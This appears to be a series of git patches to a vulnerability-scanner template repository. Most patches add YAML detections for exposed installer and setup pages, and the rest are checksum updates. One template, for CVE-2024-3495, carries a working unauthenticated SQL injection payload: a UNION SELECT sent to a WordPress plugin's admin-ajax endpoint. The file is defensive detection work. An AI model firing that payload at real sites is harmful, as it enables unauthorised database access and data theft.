.../installer/ejbca-enterprise-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/ejbca-enterprise-installer.yaml diff --git a/http/misconfiguration/installer/ejbca-enterprise-installer.yaml b/http/misconfiguration/installer/ejbca-enterprise-installer.yaml new file mode 100644 index 0000000000..149bfaba41 --- /dev/null +++ b/http/misconfiguration/installer/ejbca-enterprise-installer.yaml @@ -0,0 +1,31 @@ +id: ejbca-enterprise-installer + +info: + name: EJBCA Enterprise Cloud Configuration Wizard - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed EJBCA Enterprise Cloud Installation page. + reference: + - https://aws.amazon.com/marketplace/pp/prodview-u2xdo5mkuilke + metadata: + verified: true + max-request: 1 + shodan-query: html:"EJBCA Enterprise Cloud Configuration Wizard" + tags: misconfig,install,exposure,ejbca + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "EJBCA Enterprise Cloud Configuration Wizard" + + - type: status + status: + - 200 From f18f623d62116daf37d3c30b576fa35c6eddfc64 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 23:40:49 +0530 Subject: [PATCH 394/847] Create uvdesk-helpdesk-installer.yaml --- .../installer/uvdesk-helpdesk-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml diff --git a/http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml b/http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml new file mode 100644 index 0000000000..2a4069893e --- /dev/null +++ b/http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml @@ -0,0 +1,31 @@ +id: uvdesk-helpdesk-installer + +info: + name: UVDesk Helpdesk Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed UVDesk Helpdesk Installation page. + reference: + - https://www.uvdesk.com/en/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"UVDesk Helpdesk Community Edition - Installation Wizard" + tags: misconfig,install,exposure,uvdesk,helpdesk + +http: + - method: GET + path: + - "{{BaseURL}}/#welcome" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "UVDesk Helpdesk Community Edition - Installation Wizard" + + - type: status + status: + - 200 From e6b6ac12c9d022190f66b71cc6bc01ece5907469 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 11:31:58 +0530 Subject: [PATCH 395/847] Create tastyigniter-installer.yaml --- .../installer/tastyigniter-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/tastyigniter-installer.yaml diff --git a/http/misconfiguration/installer/tastyigniter-installer.yaml b/http/misconfiguration/installer/tastyigniter-installer.yaml new file mode 100644 index 0000000000..a455d46fd5 --- /dev/null +++ b/http/misconfiguration/installer/tastyigniter-installer.yaml @@ -0,0 +1,31 @@ +id: tastyigniter-installer + +info: + name: TastyIgniter Setup Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed TastyIgniter Setup page. + reference: + - https://tastyigniter.com/ + metadata: + verified: true + max-request: 1 + fofa-query: body="TastyIgniter - Setup - License agreement" + tags: misconfig,install,exposure,tastyigniter + +http: + - method: GET + path: + - "{{BaseURL}}/setup/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "TastyIgniter - Setup" + + - type: status + status: + - 200 From 306c7764a5eef50ce9823bda4af7d1f46769e083 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 11:45:32 +0530 Subject: [PATCH 396/847] Create glpi-installer.yaml --- .../installer/glpi-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/glpi-installer.yaml diff --git a/http/misconfiguration/installer/glpi-installer.yaml b/http/misconfiguration/installer/glpi-installer.yaml new file mode 100644 index 0000000000..9db17a527d --- /dev/null +++ b/http/misconfiguration/installer/glpi-installer.yaml @@ -0,0 +1,31 @@ +id: glpi-installer + +info: + name: GLPI Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed GLPI Setup page. + reference: + - https://glpi-project.org/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"Setup GLPI" + tags: misconfig,install,exposure,glpi + +http: + - method: GET + path: + - "{{BaseURL}}/install/install.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Setup GLPI" + + - type: status + status: + - 200 From c60505d30754b428649b8b2a3cf62540a300aae6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 11:49:42 +0530 Subject: [PATCH 397/847] Create jfa-go-installer.yaml --- .../installer/jfa-go-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/jfa-go-installer.yaml diff --git a/http/misconfiguration/installer/jfa-go-installer.yaml b/http/misconfiguration/installer/jfa-go-installer.yaml new file mode 100644 index 0000000000..5909fa7972 --- /dev/null +++ b/http/misconfiguration/installer/jfa-go-installer.yaml @@ -0,0 +1,31 @@ +id: jfa-go-installer + +info: + name: jfa-go Setup Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed jfa-go Setup page. + reference: + - https://github.com/hrfee/jfa-go + metadata: + verified: true + max-request: 1 + shodan-query: html:"Setup - jfa-go" + tags: misconfig,install,exposure,jfa-go + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Setup - jfa-go" + + - type: status + status: + - 200 From 331ba388a7353f5ee763ee75008109c136910833 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 29 May 2024 11:54:51 +0530 Subject: [PATCH 398/847] Create CVE-2024-3495.yaml --- http/cves/2024/CVE-2024-3495.yaml | 52 +++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 http/cves/2024/CVE-2024-3495.yaml diff --git a/http/cves/2024/CVE-2024-3495.yaml b/http/cves/2024/CVE-2024-3495.yaml new file mode 100644 index 0000000000..d057c9feac --- /dev/null +++ b/http/cves/2024/CVE-2024-3495.yaml @@ -0,0 +1,52 @@ +id: CVE-2024-3495 + +info: + name: Wordpress Country State City Dropdown <=2.7.2 - SQL Injection + author: apple + severity: high + description: | + The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the ‘cnt’ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://sploitus.com/exploit?id=EDF4B3F8-DDF4-5196-A375-EC81B8BC18F1&utm_source=rss&utm_medium=rss + - https://github.com/truonghuuphuc/CVE-2024-3495-Poc + - https://nvd.nist.gov/vuln/detail/CVE-2024-3495 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-3495 + cwe-id: CWE-89 + metadata: + max-request: 2 + verified: true + publicwww-query: "/wp-content/plugins/country-state-city-auto-dropdown" + tags: cve,cve2024,wp,wp-plugin,wordpress,sqli + +variables: + num: "999999999" + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=tc_csca_get_cities&nonce_ajax={{nonce}}&sid=1+or+0+union+select+concat(0x64617461626173653a,(select%20md5({{num}})),0x7c76657273696f6e3a,(select%20md5({{num}})),0x7c757365723a,user()),2,3--+- + + matchers: + - type: word + part: body_2 + words: + - '{{md5(num)}}' + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - '"nonce":"(\S*)"' + internal: true From cb125a852cf1945550acf9731019d849f63d1271 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 29 May 2024 13:26:26 +0700 Subject: [PATCH 399/847] fix: false negative fortiweb-panel.yaml --- http/exposed-panels/fortinet/fortiweb-panel.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/exposed-panels/fortinet/fortiweb-panel.yaml b/http/exposed-panels/fortinet/fortiweb-panel.yaml index 44d8cbc9a9..76942ae247 100644 --- a/http/exposed-panels/fortinet/fortiweb-panel.yaml +++ b/http/exposed-panels/fortinet/fortiweb-panel.yaml @@ -2,7 +2,7 @@ id: fortiweb-login info: name: Fortinet FortiWeb Login Panel - Detect - author: PR3R00T + author: PR3R00T,daffainfo severity: info description: Fortinet FortiWeb login panel was detected. classification: @@ -11,6 +11,7 @@ info: cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* metadata: max-request: 1 + shodan-query: http.title:"FortiWeb - " product: fortiweb vendor: fortinet tags: panel,fortinet,fortiweb,login @@ -27,10 +28,9 @@ http: words: - "Please login" - "ftnt-fortinet-grid" - - "main-fortiweb.css" condition: and - type: status status: - 200 -# digest: 4b0a00483046022100903d0b01156fa0e1e1e76dbcc24d8cb562c86a57525a5d88ec5c675f4331fdd3022100b5f3290d941b6e6afd66f7a09b92b23651f4abce54ef8f8a365920e23746cd81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100903d0b01156fa0e1e1e76dbcc24d8cb562c86a57525a5d88ec5c675f4331fdd3022100b5f3290d941b6e6afd66f7a09b92b23651f4abce54ef8f8a365920e23746cd81:922c64590222798bb761d5b6d8e72950 From 7464f6ef0bf89434a94dff7d4fb29dada2378be3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 12:03:05 +0530 Subject: [PATCH 400/847] Create profittrailer-installer.yaml --- .../installer/profittrailer-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/profittrailer-installer.yaml diff --git a/http/misconfiguration/installer/profittrailer-installer.yaml b/http/misconfiguration/installer/profittrailer-installer.yaml new file mode 100644 index 0000000000..ed33927a01 --- /dev/null +++ b/http/misconfiguration/installer/profittrailer-installer.yaml @@ -0,0 +1,31 @@ +id: profittrailer-installer + +info: + name: ProfitTrailer Setup Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed ProfitTrailer Setup page. + reference: + - https://profittrailer.com/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"ProfitTrailer Setup" + tags: misconfig,install,exposure,profittrailer + +http: + - method: GET + path: + - "{{BaseURL}}/setup/license" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "ProfitTrailer Setup" + + - type: status + status: + - 200 From ade9b2a6afc61cc787a40510e6e88510a4c62c37 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 12:10:53 +0530 Subject: [PATCH 401/847] Create onlyoffice-installer.yaml --- .../installer/onlyoffice-installer.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/misconfiguration/installer/onlyoffice-installer.yaml diff --git a/http/misconfiguration/installer/onlyoffice-installer.yaml b/http/misconfiguration/installer/onlyoffice-installer.yaml new file mode 100644 index 0000000000..a8b696489d --- /dev/null +++ b/http/misconfiguration/installer/onlyoffice-installer.yaml @@ -0,0 +1,33 @@ +id: onlyoffice-installer + +info: + name: OnlyOffice Wizard Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed OnlyOffice Setup page. + reference: + - https://www.onlyoffice.com/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"Portal Setup" + tags: misconfig,install,exposure,onlyoffice + +http: + - method: GET + path: + - "{{BaseURL}}/Wizard.aspx" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Portal Setup" + - "onlyoffice" + condition: and + + - type: status + status: + - 200 From f830f4659ad9a33cef92536869c0fd1034e46ca4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 12:21:21 +0530 Subject: [PATCH 402/847] Create activecollab-installer.yaml --- .../installer/activecollab-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/activecollab-installer.yaml diff --git a/http/misconfiguration/installer/activecollab-installer.yaml b/http/misconfiguration/installer/activecollab-installer.yaml new file mode 100644 index 0000000000..fc9b129292 --- /dev/null +++ b/http/misconfiguration/installer/activecollab-installer.yaml @@ -0,0 +1,31 @@ +id: activecollab-installer + +info: + name: ActiveCollab Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed ActiveCollab Installation page. + reference: + - https://activecollab.com/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"ActiveCollab Installer" + tags: misconfig,install,exposure,activecollab + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "ActiveCollab Installer" + + - type: status + status: + - 200 From 217e1229475c332f2b1ca44d4245f9c7b997d183 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 13:22:08 +0530 Subject: [PATCH 403/847] Create virtual-smartzone-installer.yaml --- .../virtual-smartzone-installer.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/misconfiguration/installer/virtual-smartzone-installer.yaml diff --git a/http/misconfiguration/installer/virtual-smartzone-installer.yaml b/http/misconfiguration/installer/virtual-smartzone-installer.yaml new file mode 100644 index 0000000000..31adce8ade --- /dev/null +++ b/http/misconfiguration/installer/virtual-smartzone-installer.yaml @@ -0,0 +1,33 @@ +id: virtual-smartzone-installer + +info: + name: Virtual SmartZone Setup Wizard - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed Virtual SmartZone Installation page. + reference: + - https://support.ruckuswireless.com/products/83-virtual-smartzone-vsz + metadata: + verified: true + max-request: 1 + shodan-query: html:"Virtual SmartZone" + tags: misconfig,install,exposure,virtual-smartzone + +http: + - method: GET + path: + - "{{BaseURL}}/adminweb/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Virtual SmartZone" + - "Setup Wizard" + condition: and + + - type: status + status: + - 200 From 1d01b279795e611390bc0e874f89a3c57a86ab86 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 13:26:16 +0530 Subject: [PATCH 404/847] minor update --- http/cves/2024/CVE-2024-3495.yaml | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-3495.yaml b/http/cves/2024/CVE-2024-3495.yaml index d057c9feac..076e2dc12d 100644 --- a/http/cves/2024/CVE-2024-3495.yaml +++ b/http/cves/2024/CVE-2024-3495.yaml @@ -3,21 +3,25 @@ id: CVE-2024-3495 info: name: Wordpress Country State City Dropdown <=2.7.2 - SQL Injection author: apple - severity: high + severity: critical description: | The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the ‘cnt’ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. reference: - https://sploitus.com/exploit?id=EDF4B3F8-DDF4-5196-A375-EC81B8BC18F1&utm_source=rss&utm_medium=rss - https://github.com/truonghuuphuc/CVE-2024-3495-Poc - https://nvd.nist.gov/vuln/detail/CVE-2024-3495 + - https://plugins.trac.wordpress.org/browser/country-state-city-auto-dropdown/trunk/includes/ajax-actions.php#L22 + - https://plugins.trac.wordpress.org/browser/country-state-city-auto-dropdown/trunk/includes/ajax-actions.php#L8 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-3495 cwe-id: CWE-89 + epss-score: 0.00065 + epss-percentile: 0.28393 metadata: - max-request: 2 verified: true + max-request: 2 publicwww-query: "/wp-content/plugins/country-state-city-auto-dropdown" tags: cve,cve2024,wp,wp-plugin,wordpress,sqli From abadfe39f2320ae3139026bcf87cc1435592a881 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 07:57:51 +0000 Subject: [PATCH 405/847] Auto Generated New Template Addition List [Wed May 29 07:57:51 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 964b89e7cd..063d342aed 100644 --- a/.new-additions +++ b/.new-additions @@ -9,6 +9,7 @@ http/cves/2024/CVE-2024-5230.yaml http/default-logins/ampjuke-default-login.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml +http/exposed-panels/busybox-repository-browser.yaml http/exposed-panels/cisco-firepower-panel.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml http/exposures/tokens/wechat/wechat-secret-key.yaml From 24df04278c655894c032b3cea03b12e07e8af9f7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 07:57:55 +0000 Subject: [PATCH 406/847] Auto Generated Templates Checksum [Wed May 29 07:57:55 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4eeb1d9544..cfc7658464 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3631,6 +3631,7 @@ http/exposed-panels/bonobo-server-panel.yaml:43a9e4867d71b96735ed7204ac8188a73e8 http/exposed-panels/bookstack-panel.yaml:6aa200c15b16ebfaa41c6ede6c814ccae56115fb http/exposed-panels/buddy-panel.yaml:612c814fabd73cab9fbcabc30169454db23c583b http/exposed-panels/buildbot-panel.yaml:c61b26d17d36adafb7f6642b12d64078e3aebc15 +http/exposed-panels/busybox-repository-browser.yaml:fedbe7dab622d91bf01cf75e62d0a9637d975736 http/exposed-panels/bynder-panel.yaml:6cb1f105a7d932e3123174ce57392fd0e4238a9d http/exposed-panels/c2/ares-rat-c2.yaml:1aac3bf878b995e385e7543bf774dd43c1c9a498 http/exposed-panels/c2/brute-ratel-c4.yaml:f2c6438699c51caca084e6ceddebfc4caf1414e2 @@ -5407,7 +5408,7 @@ http/misconfiguration/installer/chamilo-installer.yaml:a0c0b5aeeb609610b3c883600 http/misconfiguration/installer/circarlife-setup.yaml:a156b34f363e32ba5b727edf8e4c1334c8d7c49a http/misconfiguration/installer/clipbucket-installer.yaml:953b61e17da228a814a1ea84ac3ff2e0579a4804 http/misconfiguration/installer/cloudcenter-Installer.yaml:962ce42554b0a67568e837ed06e88025c78a610c -http/misconfiguration/installer/cms-made-simple-installer.yaml:b928a746fbe5cd2e551019a88715cbc797d71104 +http/misconfiguration/installer/cms-made-simple-installer.yaml:bd77905eec6dd64638779bd3316e66859c23446e http/misconfiguration/installer/codeigniter-installer.yaml:fd1d80362d9f4c812f2a205c0db51bd4a970afc8 http/misconfiguration/installer/combodo-itop-installer.yaml:a7551d44c75895abdb04ecb2762433101a90a11e http/misconfiguration/installer/concrete-installer.yaml:4f7a95cbe753e256638993a221e3f9d836d7e402 @@ -8581,7 +8582,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c57bb8f7de4b36023acff4442e06229729d6ebc9 +templates-checksum.txt:65550fbf71db804f6717770f1abaa9223f119a11 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d8055baf0e3733ed2fe0c29ee72cab58348a51c8 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 07:58:34 +0000 Subject: [PATCH 407/847] Auto Generated New Template Addition List [Wed May 29 07:58:34 UTC 2024] :robot: --- .new-additions | 3 +++ 1 file changed, 3 insertions(+) diff --git a/.new-additions b/.new-additions index 063d342aed..94d0064387 100644 --- a/.new-additions +++ b/.new-additions @@ -13,12 +13,15 @@ http/exposed-panels/busybox-repository-browser.yaml http/exposed-panels/cisco-firepower-panel.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml http/exposures/tokens/wechat/wechat-secret-key.yaml +http/misconfiguration/installer/activecollab-installer.yaml http/misconfiguration/installer/cms-made-simple-installer.yaml http/misconfiguration/installer/flarum-installer.yaml http/misconfiguration/installer/fleetcart-installer.yaml +http/misconfiguration/installer/onlyoffice-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml http/misconfiguration/installer/projectsend-installer.yaml http/misconfiguration/installer/stackposts-installer.yaml +http/misconfiguration/installer/virtual-smartzone-installer.yaml http/technologies/gotweb-detect.yaml http/vulnerabilities/other/array-vpn-lfi.yaml http/vulnerabilities/other/cerio-dt-rce.yaml From 2d55ff69f95d97930580a663f4e5826003b4d15e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 07:58:40 +0000 Subject: [PATCH 408/847] Auto Generated Templates Checksum [Wed May 29 07:58:40 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index cfc7658464..8b9db4e433 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5517,6 +5517,7 @@ http/misconfiguration/installer/umbraco-installer.yaml:468d300c5078cf4f972eabf51 http/misconfiguration/installer/unifi-wizard-install.yaml:e7bd820e772c8d6c4b72b9fc69809ef8561d251e http/misconfiguration/installer/uvdesk-install.yaml:e09e2da072d150ee5a8ad20f68a16d026cd20837 http/misconfiguration/installer/vironeer-installer.yaml:bbb96915ddb6312c37d73639468ac9454873e277 +http/misconfiguration/installer/virtual-smartzone-installer.yaml:eb1595d8a2e010eb1afea3ce0c3469ddb2236066 http/misconfiguration/installer/vtiger-installer.yaml:0db9526b5e94e1948f72d13820bb49a346afee5c http/misconfiguration/installer/webasyst-installer.yaml:89e08267f8e97215dcf80f338c6812b515033579 http/misconfiguration/installer/webcalendar-install.yaml:030798e0e2618533f5a0f1492cfed7d9558cde7f @@ -8582,7 +8583,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:65550fbf71db804f6717770f1abaa9223f119a11 +templates-checksum.txt:359bbf28bb63d74f59e8cd2d90a090fcc2f61e09 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 849b059ac033679ed27f573848d59ea18a6bbc86 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 07:58:41 +0000 Subject: [PATCH 409/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index ea6701ee60..5e8a1980cd 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -14,6 +14,7 @@ on: - 'http/default-logins/ampjuke-default-login.yaml' - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' + - 'http/exposed-panels/busybox-repository-browser.yaml' - 'http/exposed-panels/cisco-firepower-panel.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - 'http/exposures/tokens/wechat/wechat-secret-key.yaml' From 865e558ed1f3587a277bde928406a2a5c0b80688 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 07:59:11 +0000 Subject: [PATCH 410/847] Auto Generated New Template Addition List [Wed May 29 07:59:11 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 94d0064387..87d2a683f8 100644 --- a/.new-additions +++ b/.new-additions @@ -5,6 +5,7 @@ http/cves/2023/CVE-2023-2059.yaml http/cves/2023/CVE-2023-3077.yaml http/cves/2023/CVE-2023-48084.yaml http/cves/2024/CVE-2024-21683.yaml +http/cves/2024/CVE-2024-3495.yaml http/cves/2024/CVE-2024-5230.yaml http/default-logins/ampjuke-default-login.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml @@ -19,6 +20,7 @@ http/misconfiguration/installer/flarum-installer.yaml http/misconfiguration/installer/fleetcart-installer.yaml http/misconfiguration/installer/onlyoffice-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml +http/misconfiguration/installer/profittrailer-installer.yaml http/misconfiguration/installer/projectsend-installer.yaml http/misconfiguration/installer/stackposts-installer.yaml http/misconfiguration/installer/virtual-smartzone-installer.yaml From 567c0f1697c85d1a6d188ab2d3c54cf2329af115 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 07:59:15 +0000 Subject: [PATCH 411/847] Auto Generated Templates Checksum [Wed May 29 07:59:15 UTC 2024] :robot: --- templates-checksum.txt | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8b9db4e433..49445ec6c1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5393,6 +5393,7 @@ http/misconfiguration/https-to-http-redirect.yaml:cccf8e9ceb416d8e224b314e9952d6 http/misconfiguration/ibm-friendly-path-exposure.yaml:77e6c72a9cae1a9b0a6afd79b159b08db996e463 http/misconfiguration/ibm-websphere-xml.yaml:659d65c9f64e0b6ce45ec519419cdfaf9cb77fd1 http/misconfiguration/imgproxy-unauth.yaml:2eb18535d095cf898aa3cd76128382ff8e92acff +http/misconfiguration/installer/activecollab-installer.yaml:36c1b4c95e44199ea20bc210c89205f8bef1cf2b http/misconfiguration/installer/acunetix-360-installer.yaml:13688236245b336b6a74b5b2ddce35d2e35f6421 http/misconfiguration/installer/akeeba-installer.yaml:56fc3c8f70ae91e8cb4207b97c0b088a845537f4 http/misconfiguration/installer/alma-installer.yaml:50fb01e501f60ce17284f44c30bf672eb6986d6a @@ -5467,6 +5468,7 @@ http/misconfiguration/installer/nodebb-installer.yaml:ed1f90625817f7ea87343d84d7 http/misconfiguration/installer/nopcommerce-installer.yaml:bfd555e9315506be53f26705388e2c20e2459d8a http/misconfiguration/installer/octoprint-installer.yaml:71f945261262e651c1349fcf4912d78330ed427e http/misconfiguration/installer/ojs-installer.yaml:9db5a6615b0a8adb210daea73705dac97b071006 +http/misconfiguration/installer/onlyoffice-installer.yaml:99ef19f5fdfb28ae627eaba3740df383b80b0550 http/misconfiguration/installer/openemr-setup-installer.yaml:3492aff559423b20f44da10634d6bbf53a426871 http/misconfiguration/installer/openfire-setup.yaml:a297d11c8460758d07481671287ba0d2e41026d0 http/misconfiguration/installer/openmage-install.yaml:180e538959d9ad22f7f6c64648e8d392383334bc @@ -5488,6 +5490,7 @@ http/misconfiguration/installer/pmm-installer.yaml:32509e9fe33719aacf310d33d0a40 http/misconfiguration/installer/posteio-installer.yaml:d4662ebf401e1c2128570f674b63ccf25970599b http/misconfiguration/installer/prestashop-installer.yaml:5011384078f8708b8ec90caa52c299ecb922dea5 http/misconfiguration/installer/processwire-installer.yaml:77810f7d222228fb1c1afb38560135f4b7718d24 +http/misconfiguration/installer/profittrailer-installer.yaml:234e41ef679963500411241f83a84f9f8f9facc5 http/misconfiguration/installer/projectsend-installer.yaml:aa78d14c8384bd5355f0d504c5d73032eef9cc80 http/misconfiguration/installer/qloapps-installer.yaml:4cd9381f76856e1537af119a837b6e303bc97217 http/misconfiguration/installer/redash-installer.yaml:1087870f7e1826761d0ecbfbbc60528e43e028e0 @@ -8583,7 +8586,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:359bbf28bb63d74f59e8cd2d90a090fcc2f61e09 +templates-checksum.txt:603a48ec1641792e0b75038a63d296610d4028b3 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 49b2f7bdda6f36ad877c3cbb29ee17f7e2c52c55 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 07:59:20 +0000 Subject: [PATCH 412/847] Syncing Templates --- .github/workflows/templates-sync.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 5e8a1980cd..5f8b7b8774 100644 --- a/.github/workflows/templates-sync.yml +++ 